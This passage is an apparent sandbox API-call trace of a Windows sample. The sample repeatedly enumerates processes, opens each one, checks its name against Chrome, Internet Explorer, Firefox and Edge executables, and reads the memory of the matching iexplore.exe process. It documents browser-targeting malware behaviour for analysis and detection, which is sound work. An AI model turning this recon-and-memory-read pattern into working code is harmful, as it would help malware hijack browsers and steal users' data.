	[0250.925] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0250.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.926] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0250.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.926] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0250.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.926] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.927] NtQueryInformationProcess (in: ProcessHandle=0xa0f8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0250.927] ReadProcessMemory (in: hProcess=0xa0f8, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0250.927] ReadProcessMemory (in: hProcess=0xa0f8, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0250.927] ReadProcessMemory (in: hProcess=0xa0f8, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0250.927] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0250.927] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0250.928] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xa0fc
	[0250.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.928] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0250.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.928] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.929] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0250.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.929] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.929] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0250.930] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xa100
	[0250.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.930] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0250.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.931] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.931] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0250.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.931] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.932] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.932] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xa104
	[0250.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.933] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.933] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.933] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.934] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.934] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.934] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.935] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0xa108
	[0250.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.935] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.936] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.936] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.936] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.937] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.937] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0xa10c
	[0250.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.937] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.938] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.938] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.939] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.939] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0250.940] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0xa110
	[0250.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.940] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0250.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.940] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.941] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0250.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.941] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.941] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.942] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0xa114
	[0250.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.943] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.943] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.943] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.944] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.944] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.945] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0xa118
	[0250.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.945] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.945] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.945] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.946] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.946] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0250.947] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0xa11c
	[0250.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.947] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0250.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.947] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.947] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0250.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.948] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.948] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0250.949] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0xa120
	[0250.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.949] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.949] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.949] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.950] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.950] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0250.951] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0xa124
	[0250.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.951] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0250.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.951] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.951] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0250.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.952] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.952] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0250.952] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0xa128
	[0250.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.953] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.953] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.953] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.954] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.954] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0250.955] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0xa12c
	[0250.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.955] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0250.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.955] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.955] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0250.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.956] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.956] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0250.957] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0xa130
	[0250.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.957] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0250.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.957] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.957] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0250.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.958] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.958] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0250.959] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0xa134
	[0250.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.959] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0250.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.959] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0250.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.960] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0250.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0250.960] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0250.960] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0250.961] CloseHandle (hObject=0x4fd0) returned 1
	[0250.961] Sleep (dwMilliseconds=0x64) 
	[0251.068] GetCurrentProcessId () returned 0x110
	[0251.068] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0251.075] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0251.077] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0251.079] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0251.081] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xa138
	[0251.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.081] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0251.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.081] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.082] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0251.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.082] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.082] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0251.083] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xa13c
	[0251.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.084] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0251.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.084] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.084] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0251.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.085] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.085] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0251.086] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xa140
	[0251.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.086] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0251.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.086] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.087] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0251.087] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.087] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.087] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0251.088] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xa144
	[0251.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.088] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0251.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.088] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.089] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0251.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.089] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.089] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0251.090] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xa148
	[0251.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.090] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0251.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.091] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.091] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0251.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.091] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.092] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0251.092] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xa14c
	[0251.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.093] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0251.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.093] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.093] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0251.094] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.094] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.094] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0251.095] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xa150
	[0251.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.095] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0251.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.095] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.096] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0251.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.096] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
